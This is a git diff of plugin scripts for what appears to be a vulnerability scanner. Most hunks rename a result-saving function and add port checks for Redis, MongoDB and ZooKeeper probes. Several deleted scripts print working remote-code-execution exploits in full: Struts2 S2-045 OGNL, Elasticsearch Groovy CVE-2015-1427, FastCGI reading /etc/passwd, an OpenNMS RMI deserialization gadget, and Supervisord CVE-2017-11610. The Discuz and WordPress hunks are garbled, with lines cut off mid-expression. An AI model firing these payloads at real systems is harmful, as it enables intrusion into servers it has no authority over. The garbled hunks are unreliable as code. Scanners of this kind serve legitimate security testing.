diff --git a/scripts/smb_ms17010.py b/scripts/disabled/smb_ms17010.py
similarity index 94%
rename from scripts/smb_ms17010.py
rename to scripts/disabled/smb_ms17010.py
index ef5b162..e6adfea 100644
--- a/scripts/smb_ms17010.py
+++ b/scripts/disabled/smb_ms17010.py
@@ -2,7 +2,9 @@
import socket
import binascii
-from lib.common import save_user_script_result
+from lib.common import save_script_result
+
+ports_to_check = 445
def get_tree_connect_request(ip, tree_id):
@@ -16,8 +18,9 @@ def get_tree_connect_request(ip, tree_id):
def do_check(self, url):
- if url != '/':
+ if url != '/' or 445 not in self.ports_open:
return
+
ip = self.host.split(':')[0]
port = 445
@@ -66,6 +69,6 @@ def do_check(self, url):
data = s.recv(1024)
s.close()
if "\x05\x02\x00\xc0" in data:
- save_user_script_result(self, '', ip + ':445', '', 'MS17010 SMB Remote Code Execution')
+ save_script_result(self, '', ip + ':445', '', 'MS17010 SMB Remote Code Execution')
except Exception as e:
return False
diff --git a/scripts/disabled/zookeeper_unauth.py b/scripts/disabled/zookeeper_unauth.py
new file mode 100644
index 0000000..b438585
--- /dev/null
+++ b/scripts/disabled/zookeeper_unauth.py
@@ -0,0 +1,29 @@
+# coding=utf-8
+
+import socket
+from lib.common import save_script_result
+
+ports_to_check = 2181 # 默认服务端口
+
+
+def do_check(self, url):
+ if url != '/':
+ return
+ port = 2181
+ if self.scheme == ' zookeeper' and self.port != 2181: # 非标准端口
+ port = self.port
+ elif 2181 not in self.ports_open:
+ return
+
+ try:
+ socket.setdefaulttimeout(5)
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((self.host, port))
+ s.send('envi')
+ data = s.recv(1024)
+ if 'Environment' in data:
+ save_script_result(self, '', 'zookeeper://%s:%s' % (self.host, port), '', 'Zookeeper Unauthorized Access')
+ except Exception as e:
+ pass
+ finally:
+ s.close()
diff --git a/scripts/discuz_backup_file.py b/scripts/discuz_backup_file.py
index 52597c2..40492fa 100644
--- a/scripts/discuz_backup_file.py
+++ b/scripts/discuz_backup_file.py
@@ -1,19 +1,10 @@
-# Discuz
-# /config/config_ucenter.php.bak {status=200} {tag="= 0 or \
- str(self.index_headers).find('_saltkey=') > 0:
+ str(self.index_headers).find('_saltkey=') > 0:
url_lst = ['/config/config_ucenter.php.bak',
'/config/.config_ucenter.php.swp',
@@ -27,10 +18,10 @@ def do_check(self, url):
status, headers, html_doc = self.http_request(_url)
if status == 200 or status == 206:
if html_doc.find('= 0:
- save_user_script_result(self, status, self.base_url + _url, 'Discuz Backup File Found')
+ save_script_result(self, status, self.base_url + _url, 'Discuz Backup File Found')
# getcolor DOM XSS
status, headers, html_doc = self.http_request('/static/image/admincp/getcolor.htm')
if html_doc.find("if(fun) eval('parent.'+fun+'") > 0:
- save_user_script_result(self, status, self.base_url + '/static/image/admincp/getcolor.htm',
- '', 'Discuz getcolor DOM XSS')
+ save_script_result(self, status, self.base_url + '/static/image/admincp/getcolor.htm',
+ '', 'Discuz getcolor DOM XSS')
diff --git a/scripts/elastic_search_groovy.py b/scripts/elastic_search_groovy.py
deleted file mode 100644
index a3486a9..0000000
--- a/scripts/elastic_search_groovy.py
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-
-# __author__ = '1c3z'
-# __author__ = 'xfkxfk'
-
-import json
-import httplib
-from lib.common import save_user_script_result
-
-
-def execute(ip, command):
- parameters = {
- "size": 1,
- "script_fields":
- {
- "iswin":
- {
- "script": '''java.lang.Math.class.forName("java.io.BufferedReader").getConstructor(java.io.
- Reader.class).newInstance(java.lang.Math.class.forName("java.io.InputStreamReader").
- getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName("java.
- lang.Runtime").getRuntime().exec("%s").getInputStream())).readLines()''' % command,
- "lang": "groovy"
- }
- }
- }
- data = json.dumps(parameters)
- try:
- agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'
- url = "http://%s:9200/_search?pretty" % ip
- conn = httplib.HTTPConnection(ip, port=9200, timeout=10)
- headers = {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": agent}
- conn.request(method='POST', url=url, body=data, headers=headers)
- resp = conn.getresponse()
- code = resp.status
- body = resp.read()
- if code != 200:
- return
- if body:
- body = json.loads(body)
- result = body["hits"]["hits"][0]["fields"]["iswin"][0]
- if result.find('inet addr') >= 0:
- return True
- except Exception as e:
- pass
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- if execute(ip, 'ifconfig'):
- save_user_script_result(self, '', 'http://%s:9200/_search?pretty' % ip,
- '', 'ElasticSearch Groovy remote code exec CVE-2015-1427')
diff --git a/scripts/fastcgi_remote_code_execution.py b/scripts/fastcgi_remote_code_execution.py
deleted file mode 100644
index 6588846..0000000
--- a/scripts/fastcgi_remote_code_execution.py
+++ /dev/null
@@ -1,45 +0,0 @@
-#
-import socket
-from lib.common import save_user_script_result
-
-
-def test_fastcgi(ip):
- data = """
- 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
- 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
- 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
- 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
- 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
- 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
- 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
- 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
- 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
- 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
- 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
- """
- data_s = ''
- for _ in data.split():
- data_s += chr(int(_, 16))
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(5.0)
- sock.connect((ip, 9000))
- sock.send(data_s)
- ret = sock.recv(1024)
- if ret.find(':root:') > 0:
- return True, ret
- else:
- return False, None
- except Exception as e:
- return False, None
- finally:
- sock.close()
-
-
-def do_check(self, url):
- if url != '/':
- return
- host = self.host.split(':')[0]
- ret, txt = test_fastcgi(host)
- if ret:
- save_user_script_result(self, '', host + ':9000', '', 'Fastcgi Remote Code Execution Vulnerability')
diff --git a/scripts/http_proxy.py b/scripts/http_proxy.py
deleted file mode 100644
index 41b282e..0000000
--- a/scripts/http_proxy.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#!/usr/bin/env python
-# coding=utf-8
-
-import socket
-import requests
-requests.packages.urllib3.disable_warnings()
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- ports_open = is_port_open(ip)
- headers = {
- "User-Agent": "http_proxy v0.1",
- "Connection": "close"
- }
-
- for port in ports_open:
- proxy_url = "http://{}:{}".format(ip, port)
- proxy = {"http": proxy_url, "https": proxy_url}
- try:
- _ = requests.get('http://weibo.com/robots.txt', headers=headers, proxies=proxy, timeout=10.0)
- code = _.status_code
- html = _.text
- if code == 200 and html.find("http://weibo.com/sitemap.xml") >= 0:
- save_user_script_result(self, '', '%s:%s' % (ip, port), 'HTTP Proxy')
-
- except Exception as e:
- pass
-
-
-def is_port_open(arg):
- ports_open = []
- for port in [80, 8080, 8088, 8888]:
- try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(3.0)
- if s.connect_ex((arg, port)) == 0:
- ports_open.append(port)
- except Exception as e:
- pass
- finally:
- s.close()
- return ports_open
diff --git a/scripts/is_admin.py b/scripts/is_admin_site.py
similarity index 58%
rename from scripts/is_admin.py
rename to scripts/is_admin_site.py
index 89eeee9..03dfadd 100644
--- a/scripts/is_admin.py
+++ b/scripts/is_admin_site.py
@@ -1,5 +1,4 @@
-
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
@@ -7,6 +6,5 @@ def do_check(self, url):
if self.conn_pool and self.index_status in (301, 302):
for keyword in ['admin', 'login', 'manage', 'backend']:
if self.index_headers.get('location', '').find(keyword) >= 0:
- save_user_script_result(self, self.index_status, self.base_url + '/',
- 'Admin Site')
+ save_script_result(self, self.index_status, self.base_url + '/', 'Admin Site')
break
diff --git a/scripts/log_files.py b/scripts/log_files.py
index 07dbf1b..56de8e8 100644
--- a/scripts/log_files.py
+++ b/scripts/log_files.py
@@ -18,7 +18,7 @@
# /log.tar.bz2 {status=206} {type="application/octet-stream"} {root_only}
# /log.7z {status=206} {type="application/octet-stream"} {root_only}
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
@@ -36,8 +36,8 @@ def do_check(self, url):
self.crawl('/' + log_folder + '/')
if status == 206 and self._404_status != 206:
- save_user_script_result(self, status, self.base_url + '/' + log_folder, '',
- 'Log File Found')
+ save_script_result(self, status, self.base_url + '/' + log_folder, '',
+ 'Log File Found')
url_lst = ['access.log', 'www.log', 'error.log', 'log.log', 'sql.log',
'errors.log', 'debug.log', 'db.log', 'install.log',
@@ -51,9 +51,9 @@ def do_check(self, url):
status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
# print '/' + log_folder + '/' + _url
if status == 206 and \
- (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0):
- save_user_script_result(self, status, self.base_url + url_prefix + '/' + _url,
- '', 'Log File')
+ (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0):
+ save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
+ '', 'Log File')
for log_folder in folders:
for _url in ['log.txt', 'logs.txt']:
@@ -61,5 +61,5 @@ def do_check(self, url):
status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
# print '/' + log_folder + '/' + _url
if status == 206 and headers.get('content-type', '').find('text/plain') >= 0:
- save_user_script_result(self, status, self.base_url + url_prefix + '/' + _url,
- '', 'Log File')
+ save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
+ '', 'Log File')
diff --git a/scripts/mongodb_unauth.py b/scripts/mongodb_unauth.py
deleted file mode 100644
index f1ddd41..0000000
--- a/scripts/mongodb_unauth.py
+++ /dev/null
@@ -1,21 +0,0 @@
-#!/usr/bin/python
-
-import pymongo
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- try:
- ip = self.host.split(':')[0]
- conn = pymongo.MongoClient(host=ip, port=27017, connectTimeoutMS=5000, socketTimeoutMS=5000)
- database_list = conn.database_names()
- if not database_list:
- conn.close()
- return
- detail = "%s MongoDB Unauthorized Access : %s" % (ip, ",".join(database_list))
- conn.close()
- save_user_script_result(self, '', 'mongodb://%s:27017' % ip, detail)
- except Exception as e:
- pass
diff --git a/scripts/mongodb_unauthorized_access.py b/scripts/mongodb_unauthorized_access.py
new file mode 100644
index 0000000..a5aab96
--- /dev/null
+++ b/scripts/mongodb_unauthorized_access.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# -*- encoding: utf-8 -*-
+
+import pymongo
+from lib.common import save_script_result
+
+
+ports_to_check = 27017 # 默认扫描端口
+
+
+def do_check(self, url):
+ if url != '/':
+ return
+ port = 27017
+ if self.scheme == 'mongodb' and self.port != 27017: # 非标准端口
+ port = self.port
+ elif 27017 not in self.ports_open:
+ return
+ try:
+ conn = pymongo.MongoClient(host=self.host, port=port, connectTimeoutMS=5000, socketTimeoutMS=5000)
+ database_list = conn.database_names()
+ if not database_list:
+ conn.close()
+ return
+ detail = "%s MongoDB Unauthorized Access : %s" % (self.host, ",".join(database_list))
+ conn.close()
+ save_script_result(self, '', 'mongodb://%s:%s' % (self.host, port), detail)
+ except Exception as e:
+ pass
diff --git a/scripts/opennms-1099-rmi-deserialized.py b/scripts/opennms-1099-rmi-deserialized.py
deleted file mode 100644
index c5443ad..0000000
--- a/scripts/opennms-1099-rmi-deserialized.py
+++ /dev/null
@@ -1,82 +0,0 @@
-# coding=utf-8
-
-import socket
-import binascii
-import time
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- aim = RmiScan(ip)
- if aim:
- save_user_script_result(self, '', ip + ':1099', 'OPENNMS RMI DeSerializable')
-
-
-def RmiScan(ip, port=1099, timeout=10):
- first_send = "4a524d4900024b"
- second_send = "000c31302e3131302e32382e313300000000"
- third_send ="50aced00057722000000000000000000000000000000000000000000000000000044154dc9d4e63bdf74000570776e656473" \
- "7d00000001000f6a6176612e726d692e52656d6f746570787200176a6176612e6c616e672e7265666c6563742e50726f7879" \
- "e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e" \
- "646c65723b7078707372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f63" \
- "6174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469" \
- "6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b707870737200316f72672e617061636865" \
- "2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5472616e73666f726d65644d617061773fe05df15a70030002" \
- "4c000e6b65795472616e73666f726d657274002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6" \
- "e732f5472616e73666f726d65723b4c001076616c75655472616e73666f726d657271007e000a707870707372003a6f72672" \
- "e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666" \
- "f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6" \
- "d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707572002d5b4c6f72672e6170616368652e6" \
- "36f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8341899020000707870000000067" \
- "372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616" \
- "e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4" \
- "f626a6563743b707870767200176a6176612e6e65742e55524c436c6173734c6f61646572000000000000000000000070787" \
- "07372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b6" \
- "5725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6" \
- "563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797" \
- "065737400125b4c6a6176612f6c616e672f436c6173733b707870757200135b4c6a6176612e6c616e672e4f626a6563743b9" \
- "0ce589f1073296c02000070787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000" \
- "0707870000000017672000f5b4c6a6176612e6e65742e55524c3b5251fd24c51b68cd02000070787074000e676574436f6e7" \
- "374727563746f727571007e001d000000017671007e001d7371007e00167571007e001b000000017571007e001b000000017" \
- "571007e001f000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f646549000" \
- "4706f72744c0009617574686f7269747971007e00184c000466696c6571007e00184c0004686f737471007e00184c0008707" \
- "26f746f636f6c71007e00184c000372656671007e0018707870ffffffffffffffff707400052f746d702f740000740004666" \
- "96c65707874000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e00167571007e001b00000001" \
- "74000d4572726f7242617365457865637400096c6f6164436c6173737571007e001d00000001767200106a6176612e6c616e6" \
- "72e537472696e67a0f0a4387a3bb3420200007078707371007e00167571007e001b00000002740007646f5f6578656375710" \
- "07e001d000000017100"
-
- forth_send = "7e00367400096765744d6574686f647571007e001d0000000271007e003671007e00237371007e00167571007e001b00000" \
- "00270757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007078700000000174000677686f" \
- "616d69740006696e766f6b657571007e001d00000002767200106a6176612e6c616e672e4f626a656374000000000000000" \
- "000000070787071007e002f737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f61" \
- "64466163746f724900097468726573686f6c647078703f4000000000000c7708000000100000000174000576616c7565710" \
- "07e004878787672001b6a6176612e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870"
- first_send = binascii.a2b_hex(first_send)
- second_send = binascii.a2b_hex(second_send)
- third_send = binascii.a2b_hex(third_send)
- forth_send = binascii.a2b_hex(forth_send)
-
- socket.setdefaulttimeout(timeout)
- AIM = False
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((ip, port))
- sock.send(first_send)
- sock.recv(1024)
- time.sleep(0.5)
- sock.send(second_send)
- sock.send(third_send)
- sock.send(forth_send)
- data = sock.recv(20480)
- time.sleep(1)
- if "8888" in data:
- AIM = True
- except Exception as e:
- pass
- finally:
- sock.close()
- return AIM
diff --git a/scripts/outlook_web_app.py b/scripts/outlook_web_app.py
index 12e41a4..e7989f1 100644
--- a/scripts/outlook_web_app.py
+++ b/scripts/outlook_web_app.py
@@ -1,13 +1,13 @@
-# Exchange Outlook Web APP
+# Outlook Web APP
import httplib
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
if url == '/' and self.conn_pool:
if self.index_status == 302 and self.index_headers.get('location', '').lower() == 'https://%s/owa' % self.host:
- save_user_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
+ save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
return
status, headers, html_doc = self.http_request('/ews/')
@@ -15,14 +15,14 @@ def do_check(self, url):
if status == 302:
redirect_url = headers.get('location', '')
if redirect_url == 'https://%shttp://%s/ews/' % (self.host, self.host):
- save_user_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
+ save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
return
if redirect_url == 'https://%s/ews/' % self.host:
try:
conn = httplib.HTTPSConnection(self.host)
conn.request('HEAD', '/ews')
if conn.getresponse().status == 401:
- save_user_script_result(self, 401, redirect_url, 'OutLook Web APP Found')
+ save_script_result(self, 401, redirect_url, 'OutLook Web APP Found')
conn.close()
except Exception as e:
pass
@@ -30,5 +30,5 @@ def do_check(self, url):
elif status == 401:
if headers.get('Server', '').find('Microsoft-IIS') >= 0:
- save_user_script_result(self, 401, self.base_url + '/ews/', 'OutLook Web APP Found')
+ save_script_result(self, 401, self.base_url + '/ews/', 'OutLook Web APP Found')
return
diff --git a/scripts/readme.txt b/scripts/readme.txt
new file mode 100644
index 0000000..afa02d9
--- /dev/null
+++ b/scripts/readme.txt
@@ -0,0 +1,5 @@
+
+请将你编写的脚本置于这个文件夹中
+
+Place your scripts in this folder
+
diff --git a/scripts/redis_unauthorized_access.py b/scripts/redis_unauthorized_access.py
index 47796ef..935c7a6 100644
--- a/scripts/redis_unauthorized_access.py
+++ b/scripts/redis_unauthorized_access.py
@@ -1,22 +1,33 @@
-#!/usr/bin/python
+#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
import socket
-from lib.common import save_user_script_result
+from lib.common import save_script_result
+
+
+ports_to_check = 6379 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
+ port = 6379
+ # 非标准端口,不需要检查6379端口是否开放
+ # 支持用户传入目标 redis://test.ip:16379 来扫描非标准端口上的Redis服务
+ if self.scheme == 'redis' and self.port != 6379:
+ port = self.port
+ elif 6379 not in self.ports_open:
+ return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
try:
host = self.host.split(':')[0]
- s.connect((host, 6379))
+ s.connect((host, port))
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
s.send(payload)
data = s.recv(1024)
s.close()
if "redis_version" in data:
- save_user_script_result(self, '', 'redis://' + host + ':6379', 'Redis Unauthorized Access')
+ save_script_result(self, '', 'redis://%s:%s' % (host, port), 'Redis Unauthorized Access')
except Exception as e:
s.close()
diff --git a/scripts/scan_by_hostname_or_folder.py b/scripts/scan_by_hostname_or_folder.py
index fbe11ee..44e9851 100644
--- a/scripts/scan_by_hostname_or_folder.py
+++ b/scripts/scan_by_hostname_or_folder.py
@@ -22,7 +22,7 @@
# /../{hostname_or_folder}.log {status=206} {type="application/"}
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
@@ -36,18 +36,18 @@ def do_check(self, url):
for ext in extensions:
status, headers, html_doc = self.http_request('/' + name + ext)
if status == 206 and \
- (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0) or \
+ (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0) or \
(ext == '.sql' and html_doc.find("CREATE TABLE") >= 0):
- save_user_script_result(self, status, self.base_url + '/' + name + ext,
- '', 'Compressed File')
+ save_script_result(self, status, self.base_url + '/' + name + ext,
+ '', 'Compressed File')
elif url != '/':
# sub folders like /aaa/bbb/
folder_name = url.split('/')[-2]
if len(folder_name) >= 4:
- url_prefix = url[: -len(folder_name)-1]
+ url_prefix = url[: -len(folder_name) - 1]
for ext in extensions:
status, headers, html_doc = self.http_request(url_prefix + folder_name + ext)
if status == 206 and headers.get('content-type', '').find('application/') >= 0:
- save_user_script_result(self, status, self.base_url + url_prefix + folder_name + ext,
- '', 'Compressed File')
+ save_script_result(self, status, self.base_url + url_prefix + folder_name + ext,
+ '', 'Compressed File')
diff --git a/scripts/sensitive_folders.py b/scripts/sensitive_folders.py
index 2f3ed2d..89281e5 100644
--- a/scripts/sensitive_folders.py
+++ b/scripts/sensitive_folders.py
@@ -1,26 +1,4 @@
-
-from lib.common import save_user_script_result
-
-'''
-Temporary disabled item:
-
-/WEB-INF/classes
-/jPlayer
-/jwplayer
-/extjs
-/swfupload
-/boss
-/editor
-/ckeditor
-/htmedit
-/htmleditor
-/ueditor
-/tomcat
-/output
-/fck
-/cgi-bin
-'''
-
+from lib.common import save_script_result
folders = """
/admin
@@ -64,5 +42,5 @@ def do_check(self, url):
self.crawl(_url + '/')
if status == 206 and self._404_status != 206:
- save_user_script_result(self, status, self.base_url + _url,
- '', 'Possible Sensitive File Found')
+ save_script_result(self, status, self.base_url + _url,
+ '', 'Possible Sensitive File Found')
diff --git a/scripts/struts_s0245_rce.py b/scripts/struts_s0245_rce.py
deleted file mode 100644
index fb0b298..0000000
--- a/scripts/struts_s0245_rce.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python
-# coding=utf-8
-
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/' and not url.endswith('.action') and not url.endswith('.do'):
- return
- if not self.conn_pool:
- return
- cmd = 'env'
- headers = {}
- headers['User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) " \
- "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
- headers['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
- "(#_memberAccess?(#_memberAccess=#dm):" \
- "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
- "(#ognlUtil=#container.getInstance" \
- "(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
- "(#ognlUtil.getExcludedPackageNames().clear())." \
- "(#ognlUtil.getExcludedClasses().clear())." \
- "(#context.setMemberAccess(#dm))))." \
- "(#cmd='" + \
- cmd + \
- "')." \
- "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase()." \
- "contains('win')))." \
- "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
- "(#p=new java.lang.ProcessBuilder(#cmds))." \
- "(#p.redirectErrorStream(true)).(#process=#p.start())." \
- "(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \
- "getOutputStream()))." \
- "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
- "(#ros.flush())}"
- data = '--40a1f31a0ec74efaa46d53e9f4311353\r\n' \
- 'Content-Disposition: form-data; name="image1"\r\n' \
- 'Content-Type: text/plain; charset=utf-8\r\n\r\ntest\r\n--40a1f31a0ec74efaa46d53e9f4311353--\r\n'
- try:
- html = self.conn_pool.urlopen(method='POST', url=self.base_url + '/' + url, body=data, headers=headers, retries=1).data
- if html.find('LOGNAME=') >= 0:
- save_user_script_result(self, '', self.base_url + '/' + url, '', 'Struts2 s02-45 Remote Code Execution')
- except Exception as e:
- pass
diff --git a/scripts/supervisord_rce.py b/scripts/supervisord_rce.py
deleted file mode 100644
index 2c0aa9f..0000000
--- a/scripts/supervisord_rce.py
+++ /dev/null
@@ -1,31 +0,0 @@
-# -*- coding: utf-8 -*-
-# @Author : helit
-# Ref: https://github.com/phith0n/vulhub/blob/master/supervisor/CVE-2017-11610/poc.py
-
-import xmlrpclib
-import random
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- arg = self.host
- if ':9001' not in arg:
- domain = arg + ':9001'
- else:
- domain = arg
- target = 'http://' + domain + '/RPC2'
- try:
- proxy = xmlrpclib.ServerProxy(target)
- old = getattr(proxy, 'supervisor.readLog')(0,0)
- a = random.randint(10000000, 20000000)
- b = random.randint(10000000, 20000000)
- command = 'expr ' + str(a) + ' + ' + str(b)
- logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
- getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
- result = getattr(proxy, 'supervisor.readLog')(0,0)
- if result[len(old):].strip() == str(a+b):
- save_user_script_result(self, '', arg, '', 'CVE-2017-11610 Supervisor Remote Command Execution')
- except Exception as e:
- pass
diff --git a/scripts/tools/__init__.py b/scripts/tools/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/scripts/tools/port_scan.py b/scripts/tools/port_scan.py
new file mode 100644
index 0000000..0a47647
--- /dev/null
+++ b/scripts/tools/port_scan.py
@@ -0,0 +1,10 @@
+#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
+# ports_to_check 设置为 想要扫描的1个或多个端口
+# python BBScan.py --scripts-only --script port_scan --host www.baidu.com --network 16 --save-ports ports_80.txt
+
+ports_to_check = [80]
+
+
+def do_check(self, url):
+ pass
\ No newline at end of file
diff --git a/scripts/wordpress_backup_file.py b/scripts/wordpress_backup_file.py
index b341173..98d8df7 100644
--- a/scripts/wordpress_backup_file.py
+++ b/scripts/wordpress_backup_file.py
@@ -1,13 +1,6 @@
# Wordpress
-# /wp-config.php.inc {status=200} {tag="= 0:
- save_user_script_result(self, status, self.base_url + _url, '', 'WordPress Backup File Found')
+ save_script_result(self, status, self.base_url + _url, '', 'WordPress Backup File Found')
diff --git a/scripts/zookeeper_unauth.py b/scripts/zookeeper_unauth.py
deleted file mode 100644
index aac2852..0000000
--- a/scripts/zookeeper_unauth.py
+++ /dev/null
@@ -1,22 +0,0 @@
-# coding=utf-8
-
-import socket
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- try:
- socket.setdefaulttimeout(5)
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((ip, 2181))
- s.send('envi')
- data = s.recv(1024)
- if 'Environment' in data:
- save_user_script_result(self, '', 'zookeeper://%s:2181' % ip, '', 'Zookeeper Unauthorized Access')
- except Exception as e:
- pass
- finally:
- s.close()